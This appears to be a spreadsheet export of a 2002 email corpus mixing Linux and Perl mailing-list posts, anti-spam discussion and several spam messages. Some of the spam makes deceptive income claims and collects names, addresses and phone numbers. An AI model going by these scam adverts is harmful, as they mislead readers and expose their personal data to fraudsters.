 I *_was_* confused.
 &gt; A Linux distribution (_any_ Linux distribution)
 &gt; contains lots and lots of separate codebases.
 &gt; Some are under the GNU GPL. Many are not.
 Indeed - that I actually had understood prior
 to all this - for example commercial entities
 with trial/limited/crippled editions. 
 Which is no problem - I don't see why that should
 be a problem for SuSE though - surely the 
 more the merrrier as far as they're concerned.
 &gt; Are you clear on this point, now?
 Vide supra.
 &gt; This is my second try. 
 Mighty white of you, old bean.
 &gt;  One suspects that you actually understand
 &gt;  perfectly, but just don't like it.
 One can suspect what one likes. What I didn't 
 understand was that SuSE had proprietary 
 extensions that it wasn't prepared to allow
 people to use under the GPL or even under  a
 FreeBSD style licence.
 I thought that the model for the likes of 
 SuSE was selling support and customisation, 
 rather than what I thought of as the core
 "product". I thought that the likes of Yast
 came under core - maybe it worked in the glory
 days before, say, 2001 - I can understand that
 they might want to make more money, but the way
 in which they have done it, seems to me, to be 
 be against the spirit of the GPL.
 &gt; You're further confused if you think the GNU 
 &gt; GPL gives you the right to get covered software
 &gt; for free.  It does not.  
 All I want is the OS and GNU apps. I was under
 the impression that for *_those_* all one
 needed was to pay for the media and not for the
 code itself?
 Ai-je tort?
 &gt; It provides that _if_ you've lawfully received
 &gt; a copy of the covered binary version, you have
 &gt; rights to also receive the matching source code.
 My understanding was that binaries or whatever
 could be received for the cost of the media plus
 a token of one's appreciation (the latter being
 subject to agreement between the parties) - I was
 offering a bottle of wine plus maybe a pint or two
 and a chat for a copy - I don't know what the going
 rate is.
 If I wanted support from SuSE, that would be a
 different issue, and one for which I would be
 willing to pay.
 &gt; &gt; I don't particularly need support, so I'm 
 &gt; &gt; no really interested in purchasing a set of 
 &gt; &gt; disks with 4 billion apps which I'll never use.
 &gt; Then, if you nonetheless want a SuSE boxed set's
 &gt; contents, the only way you can do that without
 &gt; copyright violation _and_ without having to pay
 &gt; the purchase price is to get someone to _give_ 
 &gt; (not "lend" or duplicate) you his copy.
 I have a friend with 7.3 - I think that I'll
 end up doing that!
 Seems to me to go against the spirit of
 the GPL though.
 &gt; &gt; Yes, thanks for your input. Anyway, I've a 
 &gt; &gt; friend with 7.3 pro, so I'll just ask him.
 &gt; Ask him _what_?  If you're asking him to "lend" or
 &gt; duplicate his CDs, then you'll be ripping off SuSE
 &gt; Linux AG illegally.
 I have now realised this, thanks to your kind
 explanations. I can borrow them, but not 
 copy them? That's fine - IMHO, it goes against
 the spirit of the GPL though.
 &gt; Don't like SuSE's product licensing?  Write your 
 &gt; own distribution.  
 And why not my own OS, while I'm at it?
 &gt; You can even grab most of what you need 
 &gt; _from SuSE_.  All you have to do is heed the
 &gt; licensing terms on the individual pieces.
 And, as I've tried to explain, is not the licence
 terms on, say, trials for commercial company x
 to which I object, it is the way SuSE appears, 
 at least to my I.T. peasant self, to have
 mixed up proprietary and open stuff.
 &gt; What, you think that's too much work?  Then, 
 &gt; try a different distribution.
 Hence my "To hell with SuSE" post...
 &gt; Clue: _Not_ one packaged in a retail
 &gt; boxed set.  Even RH 7.3 retail boxed sets include
 &gt; non-freely redistributable applications on
 &gt; the Star office 5.2 CD and the Productivity
 &gt; Applications CD, among others.
 And I have no problem with people sticking trial
 editions along with GPL'ed stuff. Why you 
 can't pass those on though, is beyond me.
 Paul...
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lonely iguana discovered in Salford
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8279860,215/
 Date: 2002-09-26T15:44:55+01:00
 *The Northerner:* Subscribe to our free email round-up of the best of the 
 northern English press.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-07-23
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * This week on perl5-porters (15-21 July 2002)
     * LAN Party at OSCON
 +--------------------------------------------------------------------+
 | This week on perl5-porters (15-21 July 2002)                       |
 |   posted by rafael on Monday July 22, @03:21 (summaries)           |
 |   http://use.perl.org/article.pl?sid=02/07/22/0725254              |
 +--------------------------------------------------------------------+
 OK, you know already the big news of the week, don't you ? This report
 will tell you what happened behind the scenes of the 5.8.0 final
 releasing.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/07/22/0725254
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/07/22/0725254
 +--------------------------------------------------------------------+
 | LAN Party at OSCON                                                 |
 |   posted by ziggy on Monday July 22, @13:06 (events)               |
 |   http://use.perl.org/article.pl?sid=02/07/22/179214               |
 +--------------------------------------------------------------------+
 [0]cwest writes "At [1]O'Reilly [2]Open Source Convention, [3]Aaronsen
 Group Ltd, [4]DynDNS, and [5]Stonehenge Consulting are hosting a great
 party. 15 gaming class computers will be networked together as the base
 of a killer [6]Quake 3 Arena fragging. The bar will be open for your
 drinking pleasure. The party is open to all OSCON attendees and
 participants. Come rub elbows with the best programmers on earth and
 simultaneously destroy them in Quake."
 The [7]LAN Party will be held on Thursday, 8pm - ??, at Quinn's bar (main
 lobby, Sheraton East Tower at the conference).
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/07/22/179214
 Links:
     0. http://www.dyndns.org/lanparty
     1. http://oreilly.com/
     2. http://conferences.oreilly.com/os2002
     3. http://www.aaronsen.com/
     4. http://www.dyndns.org/
     5. http://www.stonehenge.com/
     6. http://www.quake3arena.com/games/quake/quake3-arena/
     7. http://www.dyndns.org/lanparty/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</si>
  <si>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[warning: veering further off topic]
 Philip Reynolds wrote:
 &gt; Paul Jakma's [paul@clubi.ie] 67 lines of wisdom included:
 &gt;&gt;i thought the firewalling code on all the BSDs was fairly related -
 &gt;&gt;sorry. So FreeBSD's ipfw is not encumbered in the same way the old
 &gt;&gt;OBSD firewalling was?
 ipfw was written specifically for FreeBSD under a bsd license by Luigi
 Rizzo, who's one of the FreeBSD whizzes.  All three of the BSD's
 packaged IPFilter, which has been around for donkeys years and which has
 a slightly different feature set to ipfw.
 However, last year the author of IPFilter (Darren Reed) changed the
 license on development branches of ipfilter to prohibit redistribution,
 although official releases would still be kept under the old license. 
 This policy got up the nose of Theo de Raadt (lots of things do, which
 is why OpenBSD exists in the first place), so OpenBSD re-invented the
 wheel and called their firewall "pf", under a full-time BSD license.   
 The standard release versions of ipfilter are unencumbered, as always.
 &gt; Nope, indeed IPFW2 has just been rolled out into -STABLE. (-STABLE
 &gt; is a stable branch of the code that has been rolled into -CURRENT
 &gt; first. It's basically a major release, that's still a work in
 &gt; progress)
 I'm not so sure that ipfw2 is really ready for production yet, having
 only been mfc'd last wednesday.  It certainly adds some nice syntactic
 sugar, and is apparently much faster for certain types of complex
 rulesets.  It will be good once it's had some time to settle down a
 little.
 &gt;&gt;i've no experience of ipfw. (closest i've come is looking at IPFilter 
 &gt;&gt;for IRIX - but it had a problem in that it wasnt maintained 
 &gt;&gt;anymore. however, while the englishy syntax is nice, i dont think 
 &gt;&gt;iptables command &lt;args&gt; syntax is a big obstacle).
 ipfilter is quite nice, and is my current o/s firewall of choice.  It
 has some nice features like the ability to save and restore state so
 that connections are persistent across reboots, and its logging is
 marginally better organised than ipfw's.  It's also very mature code,
 which appeals to the rather conservative tastes of my old age.
 Nick
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Repair your credit right online!           936
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] One Command -- Four Types
</t>
  </si>
  <si>
    <t xml:space="preserve">SoloCDM wrote:
 &gt; How are there four (/bin/dnsdomainname /bin/domainname
 &gt; /bin/nisdomainname /bin/ypdomainname) different types of hostname
 &gt; links with their own separate options?
 The program has different behaviour depending on the value of
 argv[0], probably...
 here's a simple example...
 #include &lt;stdio.h&gt;
 #include &lt;stdlib.h&gt;
 #include &lt;string.h&gt;
 long int add(long int a, long int b)
 {
   return a+b;
 }
 long int subtract(long int a, long int b)
 {
   return a-b;
 }
 int main(int argc, char **argv)
 {
   long int a, b; /* Operands */
   long int (*operation)(long int a, long int b);
   char *progname, *marker;
   if(argc != 3)
   {
     fprintf(stderr, "Usage: %s [int1] [int2]\n", argv[0]);
     exit(1);
   }
   progname = strrchr(argv[0], '/');
   if(progname == NULL)
     progname = argv[0];
   else
     progname ++; /* Skip past the '/' */
   if(strcmp(progname, "add") == 0)
   {
     operation = add;
   }
   else if (strcmp(progname, subtract) == 0)
   {
     operation = subtract;
   }
   else
   {
     fprintf(stderr, "Program called with invalid "
             "name %s. Quitting.\n", argv[0]);
     exit(1);
   }
   a = strtol(argv[1], &amp;marker, 0); /* Use base 16 for args
                                     * starting 0x, and base 8 for 
                                     * args starting 0 */
   if(*marker != '\0')
   {
     fprintf(stderr, "Invalid character %c in argument %s.\n",
             *marker, argv[1]);
     exit(1);
   }
   b = strtol(argv[2], &amp;marker, 0); /* Use base 16 for args
                                     * starting 0x, and base 8 for 
                                     * args starting 0 */
   if(*marker != '\0')
   {
     fprintf(stderr, "Invalid character %c in argument %s.\n",
             *marker, argv[2]);
     exit(1);
   }
   printf("%ld %c %ld = %ld\n", 
           a, 
           (operation == add)?'+':'-', 
           b, 
           operation(a, b));
   return 0;
 }
 Say that's in operation.c, compile it using 
 gcc -ansi -pedantic -Wall -W -O2 -o add operation.c
 and then 
 ln add subtract
 and run both, with appropriate arguments.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] False Positives on EFF Messages
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi everyone,
 I'm the systems admin for the Electronic Frontier Foundation and I'm using razor 
 running under spam assassin there and one my own personal server. Generally it 
 works fine with near 0 false positives - except - that almost all the false 
 positives I've seen are on messages that originated at EFF.
 So - I am wondering why RAZOR is catching EFF email and how is this happening. 
 Below is an example of what I'm talking about.
 ---------------------------------
 Envelope-to: pcn@virtualrecordings.com
 X-Sender: robin@mail.eff.org
 X-Mailer: QUALCOMM Windows Eudora Version 5.1
 To: eff-ip@eff.org
 From: Robin Gross &lt;robin@eff.org&gt;
 Subject: [E-IP] HP backs off DMCA threat - CNET.com
 Sender: eff-ip-admin@eff.org
 X-BeenThere: eff-ip@eff.org
 X-Mailman-Version: 2.0.11
 List-Unsubscribe: &lt;https://www.eff.org/mailman/listinfo/eff-ip&gt;,
          &lt;mailto:eff-ip-request@eff.org?subject=unsubscribe&gt;
 List-Id: Intelectual Property &lt;eff-ip.eff.org&gt;
 List-Post: &lt;mailto:eff-ip@eff.org&gt;
 List-Help: &lt;mailto:eff-ip-request@eff.org?subject=help&gt;
 List-Subscribe: &lt;https://www.eff.org/mailman/listinfo/eff-ip&gt;,
          &lt;mailto:eff-ip-request@eff.org?subject=subscribe&gt;
 List-Archive: &lt;https://www.eff.org/mailman/private/eff-ip/&gt;
 X-Original-Date: Fri, 02 Aug 2002 10:15:12 -0700
 Date: Fri, 02 Aug 2002 10:15:12 -0700
          tests=MAILTO_LINK,RAZOR_CHECK
          version=2.40
 2002/07/29 16:25:10 jmason Exp $)
    SPAM: -------------------- Start SpamAssassin results ----------------------
    SPAM: This mail is probably spam.  The original message has been altered
    SPAM: so you can recognise or block similar unwanted mail in future.
    SPAM: See http://spamassassin.org/tag/ for more details.
    SPAM:
    SPAM: Content analysis details:   (7.1 hits, 5 required)
    SPAM: MAILTO_LINK        (0.1 points)  BODY: Includes a URL link to send an 
 email
    SPAM: RAZOR_CHECK        (7.0 points)  Listed in Razor, see 
 http://razor.sourceforge.net/
    SPAM:
    SPAM: -------------------- End of SpamAssassin results ---------------------
 X-Spam: [SPAM] - Spam Assassin
 http://news.com.com/2100-1023-947740.html
 Document: HP backs off DMCA threat
 By CNET News.com Staff
 August 1, 2002, 6:10 PM PT
 Hewlett-Packard Thursday abandoned legal threats it made against security 
 analysts who publicized flaws in the company's software.
 In a statement released late Thursday, HP said it would not use the Digital 
 Millennium Copyright Act (DMCA), a controversial copyright law, to pursue a 
 loosely-organized team of researchers who demonstrated a bug in the company's 
 Tru64 Unix operating system.
 The following is the company's statement:
 1) HP is committed to protecting our customer's security environments.
 2) We have verified that there is a security vulnerability with Tru64 UNIX, the 
 details of which were brought to our attention July 18. The problem has now been 
 isolated and HP has been preparing a fix, which will be available within the 
 next 48 hours.
 3) We won't comment on the specifics of our discussions with SnoSoft. However, 
 we take our customers' security requirements very seriously and have a strong 
 track record following industry-standard security practices.
 4) Where and how the DMCA should be applied is a matter of great controversy. 
 The reported letter to SnoSoft was not consistent or indicative of HP's policy. 
 We can say emphatically that HP will not use the DMCA to stifle research or 
 impede the flow of information that would benefit our customers and improve 
 their system security.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Robin D. Gross - Cyberspace Attorney @ Law - Intellectual Property
 Director - Campaign for Audiovisual Free Expression (CAFE)
 Electronic Frontier Foundation
 454 Shotwell Street, San Francisco, CA 94110
 e: robin@eff.org    w: http://www.eff.org
 p: 415.863.5459    f: 415.436.9993
 http://www.eff.org/cafe
 http://www.eff.org/IP/Open_licenses
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Give Away FREE CD's - Earn $5K in 30 Days!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is the bottom line.  If you can GIVE AWAY CD's for FREE to people (like 80-100 in one month) and then let ME talk to them FOR you - if you can GIVE AWAY free product samples -  then YOU can earn $5,000 in the next 30 - 45 days.
 Think I'm kidding?  We earned PRECISELY $26,087.58 in our first 94 days doing JUST that - and we scanned our checks online for you to see them with your own eyes!  We've TWEAKED things a little because WE DON'T WANT you to talk to ANYONE.  WE WANT to talk to people FOR YOU.
 if you are ....
 VERY BUSY or,
 Aren't GOOD AT TALKING TO PEOPLE or,
 DON'T WANT to talk to people....
 Then let US work FULL TIME for you.  We've helped others....
    Julie P. earned $750 in one week with us
    Jeff A. earned $6500 in 5 weeks with us
 And we NOW have an EXACT business plan for you and can tell you EXACTLY what to expect with where you're starting.  No guesswork - we've done it.
 And if you DO want to seriously evaluate this, we would be HAPPY to even fly you to Los Angeles at OUR expense to get a closer look!  NO KIDDING! 
 To get your FREE CD, please send the following information:
 Name
 Postal Mailing Address
 Phone Number with Area Code
 mailto:cashflows99@excite.com?subject=FREE_CD
 To be removed from future mailings, please
 mailto:cashflows99@excite.com?subject=REMOVE
 ********************************
 This email ad is being sent in full compliance with U.S. Senate Bill 1618, Title #3, Section 301, which states "A statement that further transmissions of unsolicited commercial electronic mail to the recipient by the person who initiates transmission of the message may be stopped at no cost to the recipient by sending a reply to the originating electronic mail address with the word 'remove' in the subject line."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-31
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Two OSCON Lightning Talks Online
     posted by gnat on Friday August 30, @18:37 (news)
     http://use.perl.org/article.pl?sid=02/08/30/2238234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</si>
  <si>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[ILUG] Secure remote file access
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:
 &gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something
 &gt; else ? Linux servers - Linux and Mac OS-X clients.
 Can't speak for the other alternatives, but i've been using scp for
 years with sexy results.
 Steve, yes, it's a simpsons quote(ish).
 -- 
 High salt diets are bad for you - but only outside marriage.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Application #623B
</t>
  </si>
  <si>
    <t xml:space="preserve">3D24
 *Earn $2000 - $5000 weekly-starting within 1-4 weeks
 *78% Profit Paid Daily
 *No Selling
 *No Risk Guarantee
 *Work from home, No overhead, or employees.
 *High Tech Training &amp; Support
 *Not MLM, 100x more profitable
 The most incredible part of our business
 is that ALL MY CLIENTS CALL ME!
 DO YOU QUALIFY FOR OUR MENTOR PROGRAM?
 ACCEPTING ONLY 12 NEW ASSOCIATES
 This is not a hobby!  Serious Inquires Only!!
 Please reply with the following information 
 NAME:
 EMAIL ADDRESS:
 PHONE:
 BEST TIME TO CALL:
 TO:
 mailto:ieg010@yahoo.com?subject=more_info
 FOR MORE INFORMATION
 If your an entrepreneur or have always wanted to be your own BOSS,
 read on.  We supply state-of-the-art training and a support system
 that allows you to work your business from your home with just a
 phone-without cold calling.  DO NOT REPLY IF YOU ARE LOOKING FOR A 
 "GET RICH QUICK" SCHEME or some extra cash or if you're lazy.  We are
 only looking for  FOCUSED serious entrepreneurs. (Pt/FT) with the
 DESIRE to  improve their lifestyle immediately. 
 ///////////////////////////////////////////////////////////
 Please remove at mailto:ieg015@yahoo.com?subject=remove
 ///////////////////////////////////////////////////////////
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 18cent long distance conference calls
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;New Web Technology&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#EAEAAE leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DMicrosoft, Sans Sarif&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D560 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#42426F size=3D6&gt;UNLIMITED WEB CON=
 FERENCING&lt;/font&gt;&lt;/b&gt;
       &lt;HR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;Subscribe to the Web Conference C=
 enter for only $40.00 per month!
 &lt;/FONT&gt;
 &lt;br&gt;
 &lt;FONT color=3D#42426F size=3D3&gt;(Connects up to 15 participants at a time p=
 lus audio charges)&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;
 &lt;TABLE width=3D475 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#2F2F4F size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;Conduct real-time interactive meetings and presentations&lt;br&gt; ove=
 r the Internet 
       &lt;LI&gt;Application sharing
       &lt;LI&gt;Review and revise documents in real-time
       &lt;LI&gt;Record and archive your meeting 
       &lt;LI&gt;Simulate a live Classroom
       &lt;LI&gt;Quickly hold a meeting with anyone anywhere in the world
       &lt;LI&gt;Lowest rate $.18 per minute for audio (toll charges&lt;br&gt; included=
 ) Call anytime, from anywhere, to anywhere
       &lt;LI&gt;Quality, easy to use service&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/=
 TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#42426F size=3D4&gt;&lt;B&gt;FREE DEMO&lt;/B&gt;&lt;/fo=
 nt&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;FONT color=3D#42426F size=3D5&gt;&lt;B&gt;Eliminate or Reduce Travel Expense&lt;/b&gt;&lt;/=
 font&gt;
 &lt;BR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;&lt;B&gt;
 Try this on for savings... 
 and turn those unnecessary trips into problem solving and fact finding con=
 ferences, 
 saving time and wear and tear on your overworked business staff. 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#42426F size=3D4&gt;To find out more abo=
 ut this revolutionary concept,
 fill out the form below.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#2F2F4F size=3D2&gt;&lt;b&gt;Required Input Field&lt;FONT color=3D#5C=
 4033 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/b&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:conferencing1307@firemail.de?subject=3DWebC_In=
 quiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F
           size=3D2&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Web 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Company 
             Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;
             State&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Business 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Home 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Email 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsubmit&gt; 
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D350&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000000 size=3D1&gt;&lt;b&gt;All information g=
 iven herein is strictly confidential and will not be re-distributed
       for any reason other than for the specific use intended.&lt;/font&gt;&lt;/b&gt;&lt;=
 br&gt;
       &lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000
       size=3D1&gt;To be removed from our distribution lists, please  
       &lt;A href=3D"mailto:inbocks1809@firemail.com?subject=3DRemove_WebC"&gt;Cl=
 ick 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">chris arkenberg wrote:
 &gt; Cheers, Adam.
 &gt; 
 &gt; Perhaps people are starting to notice how profit motive drains the 
 &gt; meaning out of their lives.
 And, having realized that, a lot of them are now having babies.
 I can't believe the number of friends at work who are now pregnant
 or have already just had their babies.
 - Joe
 P.S. Who said that the US was required to be number 1
 at all times??? What's so bad about 6?
 -- 
 Left behind the bars
 Rows of Bishops' heads in jars
 And a bomb inside a car
 Spectacular, spectacular
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Guys, the Habeas Infringers List (HIL) exists explicitly to deal with
 spammers while we're getting judgments against them and especially in
 other countries, where those judgments are harder to get.
 Please note that nobody has ever had an incentive before to go after
 regular spammers.  Yes, some attorneys general have prosecuted blatant
 pyramid schemes, and ISPs have won some theft of service suits, but the
 vast majority of spammers go forward with out any legal hassles.  So, I
 can't understand how Daniel can assert that you can't track spammers
 down when it's never really been tried.  We can subpoena the records of
 the business they spammed on behalf of.  We can subpoena the records of
 the ISP that provided them service, and of the credit card they used for
 the whack-a-mole accounts.  We can use private investigators.  Yes,
 these people are often lowlifes (chickenboners).  But, they're not
 secret agents.  They're just trying to make a buck, and Habeas' whole
 business is about finding them and putting them out of business
 Habeas has the incentive to pursue spammers (that use our warrant mark)
 in a way that no one ever has had before.  Given that our whole business
 plan relies on Habeas becoming synonymous with "not spam", I can't
 understand why you would assume ahead of time that we will be
 unsuccessful, plan for that failure, and in so doing, remove the
 potential of success, which is anti-spam filters like SA acting on the
 Habeas warrant mark.
 Daniel, it's easy enough for you to change the Habeas scores yourself on
 your installation.  If Habeas fails to live up to its promise to only
 license the warrant mark to non-spammers and to place all violators on
 the HIL, then I have no doubt that Justin and Craig will quickly remove
 us from the next release.  But, you're trying to kill Habeas before it
 has a chance to show any promise.
 At the end of the day, SpamAssassin is like the Club, in that it
 encourages thieves (spammers) to just go after the next car (those
 without SA) rather than yours.  Habeas can play the role of LoJack (the
 transmitter), in enabling the apprehension of thieves so that they don't
 steal any more cars.  But only if we're given a chance to succeed.
           - dan
 --
 Dan Kohn &lt;mailto:dan@dankohn.com&gt;
 &lt;http://www.dankohn.com/&gt;  &lt;tel:+1-650-327-2600&gt; 
 -----Original Message-----
 From: Daniel Quinlan [mailto:quinlan@pathname.com] 
 Sent: Wednesday, August 28, 2002 16:38
 To: Matthew Cline
 Cc: spamassassin-talk@example.sourceforge.net
 Subject: Re: [SAtalk] O.T. Habeus -- Why?
 Matthew Cline &lt;matt@nightrealms.com&gt; writes:
 &gt; There must be *some* way of tracking a spammer down, since they are
 &gt; planning on making money from the spam.  What a court would consider
 &gt; evidence of being the spammer is another question.
 Haha!!!
 Just a few notes:
  - It will be difficult to find, prosecute, and win money from someone
    in various non-friendly countries where spam originates (China is a
    good example) even if they do officially "respect" copyright law.
  - Law suits take time. Between now and conclusion of the first court
    case, we could have years of spam in our mail boxes!
  - Contact information can change: phone numbers, PO boxes, stolen
    cell phones, temporary email addresses, etc.
  - Spammers do not always remember to include contact information!  I
    don't understand it either, but nobody said they were bright.  Also,
    some spam is non-commercial or sent by a third-party (for example,
    "pump and dump" stock scams), so contact information is not strictly
